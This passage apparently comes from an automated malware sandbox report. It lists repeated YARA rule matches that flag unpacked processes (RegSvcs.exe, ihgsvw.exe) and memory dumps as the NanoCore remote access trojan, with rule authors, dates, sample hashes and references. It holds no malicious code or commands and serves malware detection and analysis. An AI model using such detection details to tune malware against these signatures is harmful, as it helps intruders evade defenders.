      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
